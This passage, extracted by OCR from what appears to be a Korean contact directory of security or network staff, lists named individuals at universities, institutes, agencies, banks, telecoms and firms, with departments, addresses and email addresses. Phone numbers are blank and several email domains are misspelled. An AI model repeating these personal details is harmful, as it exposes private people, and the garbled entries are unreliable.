168 담당자 : ( 정 ) 염헌영, ( 부 ) 권선회전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : yeom@arirang.snu.ac.kr, shkwon@plaza.snu.ac.kr U R L : 서울대학교담당부서 : 전산과학과주소 : ( 우 ) 서울특별시관악구신림동산56-1 담당자 : ( 정 ), ( 부 ) 김도현팩스 : ( 정 ) , ( 부 ) 전자우편 : yeom@arirang.snu.ac.kr U R L : 서울여자대학교담당부서 : 컴퓨터학과주소 : ( 우 ) 서울시노원구공릉2동 126번지담당자 : ( 정 ) 김명주, ( 부 ) 최은정전화 : ( 정 ) , ( 부 ) ,5118 팩스 : ( 정 ) , ( 부 ) 전자우편 : mjkim@swu.ac.kr, chej@swu.ac.kr U R L : 서원대학교도서관담당부서 : 전산실주소 : ( 우 ) 충북청주시흥덕구모충동 231 담당자 : ( 정 ) 전재완, ( 부 ) 김기성전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) 떠 , ( 부 ) 전자우편 : kskim@unicom.seowon.ac.kr U R L : 숙명여자대학교담당부서 : 전산원주소 : ( 우 ) 서울특별시용산구청파동 2가 담당자 : ( 정 ) 박종익, ( 부 ) 전애실전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : pji55@sookmyung.ac.kr, asjeon@sookmyung.ac.kr U R L :

169 연세대학교담당부서 : 정보통신처주소 : ( 우 ) 서울시서대문구신촌동 134 연세대학교졍보통신처담당자 : ( 정 ) 윤대희, ( 부 ) 권기목전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) ,( 부 ) 전자우편 : dhyoun@yonsei.ac.kr, yisadmin@yonsei.ac.kr U R L : 인천대학교담당부서 : 전자계산소주소 : ( 우 ) 인천시남구도화동 177번지담당자 :( 정 ) 이은직, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : ejlee@1ion.inchon.ac.kr U R L : 인천대학교담당부서 : 전자계산소주소 : ( 우 ) 인천시남구도화동 177번지담당자 : ( 정 ) 양용주, ( 부 ) 전화 : ( 정 ) ~2, ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : yongju@1ion.inchon.ac.kr U R L : 제주대학교담당부서 : 전자계산소주소 : ( 우 ) 제주시아라1동 1번지담당자 : ( 정 ) 강건호, ( 부 ) 전화 : ( 정 )0M , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : ckang@cheju.cheju.ac.kr U R L : 충남대학교담당부서 : 전자계산소주소 : ( 우 ) 대전시유성구궁동 220 번지담당자 : ( 정 ) 황치성, ( 부 ) 정대영전화 : ( 정 ) , ( 부 )

170 팩스 : ( 정 ) , ( 부 ) 전자우편 : ccdir@hanbat.chungmm.ac.kr, dyjung@hanbat.chungmm.ac.kr U R L : 충북대학교담당부서 : 전자계산소주소 : ( 우 ) 충북청주시홍덕구개신동산 48번지담당자 : ( 정 ) 김상욱, ( 부 ) 김학서, 강전석전화 : ( 정 ) , ( 부 ) ,3013 전자우편 : tuple@cbucc.chungbuk.ac.kr, jskang@cbucc.chungbuk.ac.kr U R L : 포항공과대학교담당부서 : 학술정보원시스템운영주소 : ( 우 ) 경북포항시효자동산 31번지담당자 : ( 정 ) 오영희, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : rhee@postech.ac.kr U R L : 한국과학기술원담당부서 : 전자계산소주소 : ( 우 ) 대전광역시유성구구성동 담당자 : ( 정 ) 김병천, ( 부 ) 천성훈전화 : ( 정 )(}R) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : bckim@cais.kaist.ac.kr, shcheon@sorak.kaist.ac.kr U R L : 한국외국어대학교담당부서 : 전자계산소주소 : ( 우 ) 서울시동대문구이문동한국의대전자계산소담당자 : ( 정 ) 이영환, ( 부 ) 김민형전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : yhlee@maincc.hufs.ac.kr, cyber@maincc.hufs.ac.kr U R L : 한남대학교담당부서 : 학술정보처기획운영팀

171 주소 : ( 우 ) 대전시대덕구오정동 133번지담당자 : ( 정 ) 강철신, ( 부 ) 이진희, 김창국전화 : ( 정 ) , ( 부 ) , 팩스 : ( 정 ) , ( 부 ) , 전자우편 : cskang@eve.hannmn.co.kr,jelee@eve.hamum.ac.kr,webmaster@eve.hannam.ac.kr U R L : 호서대학교담당부서 : 전자계산소네트웍담당주소 : ( 우 ) 층남아산시배방면세출리산 29-1 담당자 : ( 정 ) 박성환, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : parksh@dogsuri.hoseo.ac.kr U R L : 2. 연구소고등기술연구원담당부서 : 기술정보센터전산팀주소 : ( 우 ) 경기도용인시용인우체국사서함 25호담당자 : ( 정 ) 김계근, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : jbyim@iae.re.kr U R L : 과학기술정책관리연구소담당부서 : 경영정보과주소 : ( 우 ) 서울시중구흥인동 13-1 한성B/D 7층담당자 : ( 정 ) 배상태, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : stbae@stepimail.stepi.re.kr U R L : 기초과학지원연구소담당부서 : 과학전산실주소 : ( 우 ) 대전광역시유성구어은동 52번지

172 담당자 : ( 정 ) 최인식, ( 부 ) 김미옥전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : ischoi@comp.kbsi.re.kr, mioak@comp.kbsi.re.kr U R L : 산업기술정보원담당부서 : DB. 정보기술개발부주소 : ( 우 ) 서울특별시동대문구청량리동 담당자 : ( 정 ) 박찬진, ( 부 ) 신기정, 김규석전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : cjpark@kiniti.re.kr, kjshin@kiniti.re.kr, gskim@kiniti.re.kr U R L : 생산기술연구원담당부서 : 정보시스템실주소 : ( 우 ) 충남천안시입장면홍천리 35-3 담당자 : ( 정 ) 김용범, ( 부 ) 이현주전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : guzzi@samsung.co.kr U R L : 정보통신정책연구원담당부서 : 전산실 ( 동향정보실 ) 주소 : ( 우 ) 경기도과천시주암동 1-33 담당자 : ( 정 ) 이윤미, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : ymlee@sunnet.kisdi.re.kr U R L : 포항산업과학연구원담당부서 : 기술정보팀주소 : ( 우 ) 경북포항시효자동산 32번지담당자 : ( 정 ) 한민환, ( 부 ) 권병준전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : minwhan@risnet.rist.re.kr, bjkwon@risnet.rist.re.kr U R L:

173 한국과학기술연구원담당부서 : 정보통신시스템실주소 : ( 우 ) 서울특별시성북구하월곡동 39-1 담당자 : ( 정 ) 윤상우, ( 부 ) 최수용전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : swyoon@kist.re.kr, sychoi@kist.re.kr U R L : 한국에너지기술연구소담당부서 : 기술확산연구부정보전산팀주소 : ( 우 ) 대전광역시유성구장동 71-2 담당자 : ( 정 ) 김광득, ( 부 ) 안상규전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kdkim@kier.re.kr U R L : 한국원자력안전기술원담당부서 : 전산실주소 : ( 우 ) 대전광역시유성구구성동 19 담당자 : ( 정 ) 이상현, ( 부 ) 진형식전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : k261rsh@kins.re.kr, hsjin@kins.re.kr U R L : 한국원자력연구소담당부서 : 전산기술실주소 : ( 우 ) 대전광역시유성구대덕연구단지사서함105호담당자 : ( 정 ) 문병수, ( 부 ) 황혜선전화 : ( 정 )(042) , ( 부 )(042) 팩스 : ( 정 )(042) , ( 부 ) 전자우편 : bsmoon@nanum.kaeri.re.kr, hhs@nanum.kaeri.re.kr U R L : 한국자원연구소담당부서 : 기술정보부정보전산실주소 : ( 우 )305ㅢ50 대전광역시유성구가정동 30번지담당자 : ( 정 ) 지광훈, ( 부 ) 서재영전화 : ( 정 )(042) , ( 부 )(042)

174 팩스 : ( 정 ) , ( 부 )(042) 전자우편 : khchi@kigam.re.kr, jysuh@rock25t.kigam.re.kr U R L : 한국전산원담당부서 : 표준연구실주소 : ( 우 ) 경기도용인시수지읍죽전리 168 담당자 : ( 정 ) 이병만, ( 부 ) 송의, 이영로전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : lbm@nca.or.kr, yrlee@nca.or.kr U R L : 한국전자통신연구원담당부서 : 정보시스템연구부주소 : ( 우 ) 대전광역시유성구가정동 161 담당자 : ( 정 ) 남상우, ( 부 ) 함계식전화 : ( 정 )(042) ,( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : bays@etri.re.kr, ksham@etri.re.kr U R L : 한국전자통신연구원 ( 구SERI) 담당부서 : 슈퍼컴퓨터센터고성능전산망개발팀주소 : ( 우 ) 대전광역시유성구어은동 1번지담당자 : ( 정 ) 박형우, ( 부 ) 임찬순, 김재우전화 : ( 정 ) , ( 부 ) ,3 팩스 : ( 정 ) , ( 부 ) 전자우편 : hwpark@garamkreat.re.kr, csim@cert-kr.or.kr, jwkim@garam.kreoat.re.kr 한국정보보호센터담당부서 : 기술지원팀주소 : ( 우 ) 서울특별시서초구서초동 호동아타워 5층담당자 : ( 정 ) 임채호, ( 부 ) 정윤종전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : chlim@certcc.or.kr, terry@certcc.or.kr U R L : 한국표준과학연구원담당부서 : 네트워크팀

175 주소 : ( 우 ) 대전시유성구도룡동 1번지담당자 : ( 정 ) 이상태, ( 부 ) 민복기전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : stlee@kriss.re.kr, bkmin@kriss.re.kr U R L : 한국항공우주연구소담당부서 : 정보전산실주소 : ( 우 ) 대전광역시유성구어은동 5번지담당자 : ( 정 ) 박천용, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : cypark@kari.re.kr U R L : 한국해양연구소담당부서 : 전산경영실주소 : ( 우 ) 경기도안산시안산우체국사서함29호담당자 : ( 정 ) 구본관, ( 부 ) 권순철전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ), ( 부 ) 전자우편 : bkkoo@kordi.re.kr, schwon@kordi.re.kr U R L : 해운산업연구원담당부서 : 전산시스템연구실주소 : ( 우 ) 서울특별시강남구삼성동 ( 융전빌딩 2층 ) 담당자 : ( 정 ) 최종회, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 3. 정부 / 공공기관국립중앙도서관주소 : ( 우 ) 서울시서초구반포동산 60-1 담당자 : ( 정 ) 조길숙, ( 부 ) 전화 : ( 정 ) , ( 부 ) U R L :

176 기상청담당부서 : 기상개발관실전산운영담당관실주소 : ( 우 ) 서울시동작구신대방동 담당자 : ( 정 ) 박원우, ( 부 ) 이동일전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : wwpark@kma.go.kr, ldi@kma.go.kr U R L : 농협중앙회담당부서 : 종합통신팀주소 : ( 우 ) 서울특별시서초구양재동 214 담당자 : ( 정 ) 박광호, ( 부 ) 차봉훈전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : cbhkys@chollian.net U R L : 대한무역투자진흥공사담당부서 : 정보화사업팀정보사업파트주소 : ( 우 ) 서울특별시강남구삼성동 159번지무역센타 1204호담당자 : ( 정 ) 김영윤, ( 부 ) 안성준전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : yykim@kotra.or.kr, sjahn@kotra.or.kr U R L : 멀티미디어교육지원센터담당부서 : 정보제공부주소 : ( 우 ) 서울특별시서초우체국사서함 269호담당자 : ( 정 ) 서영석, ( 부 ) 이용훈전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : young@edunet.nmc.nm.kr, yhyi@ms.keris.or.kr U R L : 한국무역협회담당부서 : 정보사업부업무개발과주소 : ( 우 ) 서울특별시강남구삼성동 무역회관 501호담당자 : ( 정 ) 이강일, ( 부 ) 전화 : ( 정 ) , ( 부 )

177 팩스 : ( 정 ) , ( 부 ) 전자우편 : hulmus@cotis.net U R L : 해양수산부정보보호담당관실담당부서 : 정보보화담당관실주소 : ( 우 ) 서울시강남구역삼동 진솔B/D 담당자 : ( 정 ) 이호상, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : HoSang@nehan.com U R L : 해양수산부해운, 항만정보팀담당부서 : 정보화담당관실주소 : ( 우 ) 강남구역삼동 담당자 : ( 정 ) 김기원, ( 부 ) 김경화전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kkw@momaf.go.kr U R L : 4. 금융기관 국민은행담당부서 : 전산보안팀주소 : ( 우 ) 서울시성북구종암2동 8-2 담당자 : ( 정 ) 김광우, ( 부 ) 고영주전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kimkw@ kgj@kookmin.co.kr U R L : 금융감독원담당부서 : 전산검사팀주소 : ( 우 ) 서울시영등포구여의도동 27번지담당자 : ( 정 ) 강학철, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : chkang@sbsmail.net U R L :

178 기업은행담당부서 : 전산정보부주소 : ( 우 ) 서울특별시중구을지로2가 50번지담당자 : ( 정 ) 임태식, ( 부 ) 고완선전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : Lim389@chollian.net, challa@netian.com U R L : 신한은행담당부서 : 전산정보부주소 : ( 우 ) 서울시중구태평로2가 120번지담당자 : ( 정 ) 서진원, ( 부 ) 최준환전화 : ( 정 ) , ( 부 ) (4842) 팩스 : ( 정 ) , ( 부 ) 전자우편 : suhjin@shinhan.com, choijh@shinhan.com U R L : 조흥은행담당부서 : 정보시스템부주소 : ( 우 ) 서울강남구역삼동 731번지담당자 : ( 정 ) 박희영, ( 부 ) 오성백전화 : ( 정 ) ( 구내3171), ( 부 ) ( 구내3045) 팩스 : ( 정 ) , ( 부 ) 전자우편 :y2kmanager@chohungbank.co.kr U R L : 한국주택은행담당부서 : 전산정보부주소 : ( 우 ) 서울시강서구염창동 담당자 : ( 정 ) 이종오, ( 부 ) 이승철전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) U R L : 한국증권전산담당부서 : 연구기획팀주소 : ( 우 ) 서울시영등포구여의도동 33번지한국증권전산전산기술연구소담당자 : ( 정 ) 양덕기, ( 부 ) 김철중

179 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : dkyang@ kcj@ U R L : 한빛은행담당부서 : 전산정보본부전산보안팀주소 : ( 우 ) 서울시송파구신천동 11-4 담당자 :( 정 ) 이희문, ( 부 ) 김현철전화 : ( 정 ) (7263), ( 부 ) (7540) 팩스 : ( 정 ) , ( 부 ) 전자우편 : cometojx@hanvitbank.co.kr, hckim@hmwitbank.co.kr U R L : 5. 통신사업자넥스텔주소 : ( 우 ) 서울특별시서초구서초동 소프트웨어벤쳐프라자 3층담당자 : ( 정 ) 윤재홍, ( 부 ) 전화 : ( 정 ) (213), ( 부 ) 전자우편 : yihong@uril.net U R L : 데이콤주소 : ( 우 ) 서울특별시용산구한강로 3가데이콤빌딩담당자 : ( 정 ) 이건준,( 부 ) 전화 : ( 정 ) , ( 부 ) 전자우편 : knjnlee@chollian.net 데이콤담당부서 : 보라넷운용팀주소 : ( 우 ) 서울특별시용산구한강로 3가 담당자 : ( 정 ) 배강호, ( 부 ) 황장희전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : khbae@bora.net, chhwang@bora.net U R L : 신세기통신담당부서 : 정보시스템본부

180 주소 : ( 우 ) 서울특별시중구을지로1가 16 ( 금세기빌딩 7층 ) 담당자 : ( 정 ) 김덕진, ( 부 ) 심태규전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : djkim@shinsegi.com, tksim@shinsegi.com U R L : 아이네트담당부서 : 기술개발실주소 : ( 우 ) 서울특별시강남구역삼동 아이네트빌딩담당자 :( 정 ) 김선형, ( 부 ) 홍영진전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : frogi@nuri.net, wits@nuri.net U R L : 하나로통신담당부서 : 인터넷사업추진팀주소 : ( 우 ) 서울특별시서초구서초동 국제전자센터 21층담당자 : ( 정 ) 안병균, ( 부 ) 김정훈전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : vvunix@hananet.net, hoonkim@hananet.net U R L : 한국PC통신담당부서 : 기획조정팀주소 : ( 우 ) 서울특별시종로구연건동 혜화전화국내하이텔운영센터담당자 : ( 정 ) 김명석, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kdspc123@hitel.net U R L : 한국무역정보통신담당부서 : ECIC본부주소 : ( 우 ) 서울특별시강남구삼성동 무역센터우체국사서함177호담당자 : ( 정 ) 심상렬, ( 부 ) 이종수전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : srshim@ktnet.co.kr, jslee@ktnet.co.kr

181 U R L: 한국물류정보통신담당부서 : 시스템팀주소 : ( 우 ) 서울특별시강남구역삼동 건우빌딩 8층담당자 : ( 정 ) 문백기, ( 부 ) 배동회전화 : ( 정 )(02) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : bkmoon@klnet.co.kr, realworld@klnet.co.kr U R L : 한국통신담당부서 : 멀티미디어연구소주소 : ( 우 ) 서울특별시서초구우면동 17번지담당자 : ( 정 ) 백규태, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : baegt@kt.co.kr U R L : 6. 일반기업 ( 주 ) 대흥기획담당부서 : 인터랙티브팀주소 : ( 우 ) 서울특별시종로구연지동 1-30 은석빌딩동관담당자 : ( 정 ) 강현구, ( 부 ) 김종환전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) ,( 부 ) 전자우편 : Hgkang@1otte.co.kr, Jake@helloseou1.com U R L : ( 주 ) 마니네트웍담당부서 : 정보보안팀주소 : ( 우 ) 서울특별시구로구구로동 에이스테크노타워 501호담당자 : ( 정 ) 최성백, ( 부 ) 정영진전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : sbc@maninet.com, jeen@maninet.com U R L :

182 ( 주 ) 신우정보시스템담당부서 : 정보기술연구소기술지원부주소 : ( 우 ) 서울특별시영등포구여의도동 24-1 율촌빌딩 10층담당자 : ( 정 ) 민정기, ( 부 ) 류한석전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : kck@nis.co.kr, rhs@nis.co.kr U R L : home.nis.co.kr ( 주 ) 씨큐어소프트담당부서 : 보안팀주소 : ( 우 ) 서울특별시강남구논현동 199번지대남빌딩 6층담당자 : ( 정 ) 윤삼수, ( 부 ) 이재영전화 : ( 정 ) (601), ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : ssyun@iss.co.kr, julee@iss.co.kr U R L : ( 주 ) 영캐드엔지니어링담당부서 : 연구개발팀주소 : ( 우 ) 부산시시상구보라3동 75-8 신보라소프트웨어단지 503호담당자 : ( 정 ) 안영근, ( 부 ) 박용수전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : ygahn@ycad.co.kr, yspark@goodnews.or.kr U R L : ( 주 ) 오픈데이타시스템담당부서 : SI사업부주소 : ( 우 ) 서울시강남구삼성동 9-21 담당자 : ( 정 ) 이창규, ( 부 ) 전화 : ( 정 ) (277), ( 부 ) 전자우편 : cklee@nbs.co.kr U R L : ( 주 ) 융시스템담당부서 : 개발부주소 : ( 우 ) 서울시서초구서초동 벽은빌딩 1층담당자 : ( 정 ) 박진기, ( 부 ) 김영신전화 : ( 정 ) , ( 부 ) (301) 팩스 : ( 정 ) , ( 부 )

183 전자우편 : jinki@yoongsys.co.kr, aaronkim@yoongsys.co.kr U R L : ns.yoongsys.co.kr ( 주 ) 지송정보기술담당부서 : 인터넷사업부주소 : ( 우 ) 서울시서초구서초동 서일B/D 602호담당자 : ( 정 ) 백용천, ( 부 ) 백승렬전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) U R L : A3 시큐리티컨설팅담당부서 : 침해사고대응팀주소 : ( 우 ) 서울시강남구역삼동 유성빌딩 2층이니시스내담당자 : ( 정 ) 김휘강, ( 부 ) 조상현전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : sakai@a3sc.co.kr, shcho@a3sc.co.kr U R L : IBM글로벌서비스 ( 주 ) 담당부서 : IBM 글로벌서비스데이타센타주소 : ( 우 ) 서울영등포구영등포동 한진빌딩담당자 : ( 정 ) 최복례, ( 부 ) 최수형전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : brchoi@kr.ibm.com, shchoi@kr.ibm.com U R L : I.T.System 담당부서 : 보안팀주소 : ( 우 ) 서울시영등포구영등포동 3가 대동빌딩402호담당자 : ( 정 ) 하재호, ( 부 ) 박현정전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : chili@itsystem.net, doris@itsystem.net U R L : LG 반도체주식회사담당부서 : DT연구소 SNT그룹주소 : ( 우 ) 서울특별시서초구우면동 16 번지

184 담당자 : ( 정 ) 차건업, ( 부 ) 김성원전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : chagu@igcit.co.kr, swkim@lgsemicon.co.kr U R L : LG 전자담당부서 : 컴퓨터기술팀주소 : ( 우 ) 서울특별시강남구대치동 891번지 LG영동빌딩 6층담당자 : ( 정 ) 이인홍, ( 부 ) 조철수전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : ihl@lge.co.kr, cscho@lge.co.kr U R L : LG 종합기술원담당부서 : LG종합기술원연구망팀주소 : ( 우 ) 서울특별시서초구우면동 16번지담당자 : ( 정 ) 주차흠, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : chjoo@lgcit.com U R L : LG-EDS 시스템담당부서 : 정보보안팀주소 : ( 우 ) 서울특별시영등포구여의도동 20번지 (LG 트윈타워동관 10층 ) 담당자 : ( 정 ) 최동근, ( 부 ) 주성진전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : dkchoi@1geds.lg.co.kr, sjju@lgeds.co.kr U R L : LG-EDS 시스템담당부서 : 기술연구부문인터넷사업팀보안파트주소 : ( 우 ) 인천광역시계양구효성2동 LG-EDS시스템담당자 : ( 정 ) 이철회 / ( 부 ) 흥승필전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : chlee@lgdes.lg.co.kr, philhong@lgeds.lg.co.kr U R L :

185 LG-EDS 시스템담당부서 : 특허청프로젝트팀주소 : ( 우 ) 서울특별시강남구역삼동 ( 풍림빌딩 6층 ) 담당자 : ( 정 ) 이상곤, ( 부 ) 박종광전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : stmlsga@xmail.lg.co.kr, sfmrjkb@1geds.lg.co.kr U R L : SK C&C 담당부서 : 기술연구소주소 : ( 우 ) 서울특별시강남구대치4동 892번지 ( 포스코센터서관 ) 담당자 : ( 정 ) 유진호, ( 부 ) 유진호전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) ,( 부 ) 전자우편 : jhyoo@skcc.com, jhyoo@skcc.com U R L : SK 주식회사담당부서 : 정보통신운영개발팀주소 : ( 우 ) 서울특별시영등포구여의도동 26-4 SK빌딩18층담당자 : ( 정 ) 이재헌, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : jaehun@skcorp.com U R L : SK 텔레콤담당부서 : 정보기술연구파트주소 : ( 우 ) 서울특별시관악구봉천1동 담당자 : ( 정 ) 남상훈, ( 부 ) 전화 : ( 정 )(02) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : swnam@sktelecom.com U R L : SK 텔레콤담당부서 : 총무본부총무1팀주소 : ( 우 ) 서울특별시중구남대문로 5가 267 담당자 : ( 정 ) 성상현, ( 부 ) 전화 : ( 정 ) ,( 부 )

186 팩스 : ( 정 ) , ( 부 ) U R L : 가천의과대학부속길병원담당부서 : 멀티미디어센터주소 : ( 우 ) 인천광역시남동구구월동 1198번지담당자 : ( 정 ) 김영보, ( 부 ) 박상일전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : neurokim@ghil.com, epiman@ghil.com U R L : 계양전기 ( 주 ) 담당부서 : 전산팀주소 : ( 우 ) 경기도안산시원시동 반월공단내담당자 : ( 정 ) 임정묵, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : jmlim@keyang.co.kr U R L : 교보정보통신담당부서 : 소프트웨어패키지팀주소 : ( 우 ) 서울특별시성북구성북동 담당자 : ( 정 ) 이명호, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : YIMH@kico.co.kr U R L : 농심데이터시스템담당부서 : 시스템통합운영팀주소 : ( 우 ) 서울시동작구신대방동 370번지농심B/D 2층담당자 : ( 정 ) 박윤회, ( 부 ) 임수재전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : PYH@nongshim.co.kr, doldol@nongshim.co.kr U R L : 대우정보시스템담당부서 : SS사업부

187 주소 : ( 우 ) 서울특별시중구남대문로 5가 526( 대우재단 B/D) 담당자 : ( 정 ) 박흥태, ( 부 ) 김민선전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) ,7178, ( 부 ) ,7178 전자우편 : bochoi@disc.co.kr, minsun@disc.co.kr U R L : 대우통신담당부서 : 종합연구소연구지원실주소 : ( 우 ) 경기도시흥시대야동 담당자 : ( 정 ) 고택수, ( 부 ) 한경재전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : tsko@ns.daewoo.co.kr, kjhan@ns.daewoo.co.kr U R L : 대정정보통신담당부서 : 보안기술부주소 : ( 우 ) 서울특별시영등포구여의도동 25-2 ( 경호빌딩 6층 ) 담당자 : ( 정 ) 황규대, ( 부 ) 조석제전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : manager@djic.co.kr, manager@djic.co.kr U R L : 대한항공주소 : ( 우 ) 서울특별시강서구방화동 500-3번지담당자 : ( 정 ) 정철준, ( 부 ) 전화 : ( 정 ) , ( 부 ) 전자우편 : cjjeong@koreanair.co.kr U R L : 데이타게이트인터내셔널담당부서 : 보안사업부주소 : ( 우 ) 서울특별시영등포구여의도동 35-3 ( 교원공제회관빌딩 8층 ) 담당자 : ( 정 ) 홍승창, ( 부 ) 이경하전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : simon@datagate.co.kr, scott@datagate.co.kr U R L :

188 동아기술부설연구소주소 : ( 우 ) 서울시강남구삼성동 78-1 동홍빌딩담당자 : ( 정 ) 유영환, ( 부 ) 이성환전화 : ( 정 ) ~9, ( 부 ) ~9 팩스 : ( 정 ) ~2, ( 부 ) ~2 전자우편 : yhyoo@donge.co.kr, swlee@donge.co.kr U R L : 미래산업담당부서 : 소프트포럼주소 : ( 우 ) 경기도성남시분당구서현동 ( 동서증권빌딩 6층 ) 담당자 : ( 정 ) 이종헌, ( 부 ) 전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : jhlee@softforum.co.kr U R L : 백두정보기술담당부서 : EP&C 팀주소 : ( 우 ) 서울특별시강남구청담동 80-4 송재빌딩 5층담당자 : ( 정 ) 최성규, ( 부 ) 강명회전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : skchoi@baekdoo.co.kr, mhkang@baekdoo.co.kr U R L: 사이버게이트인터내셔널담당부서 : 기술기획실주소 : ( 우 ) 서울특별시영등포구여의도동 13-4 ( 동우국제빌딩 3층 ) 담당자 : ( 정 ) 김호성, ( 부 ) 이석준전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 ) 전자우편 : hskim@cgii.co.kr, choirman@cgii.co.kr U R L : 삼성SDS 담당부서 : SM 전략실주소 : ( 우 ) 서울특별시강남구역삼동 ( 일옥빌딩 20층 ) 담당자 : ( 정 ) 노시영, ( 부 ) 안국환전화 : ( 정 ) , ( 부 ) 팩스 : ( 정 ) , ( 부 )

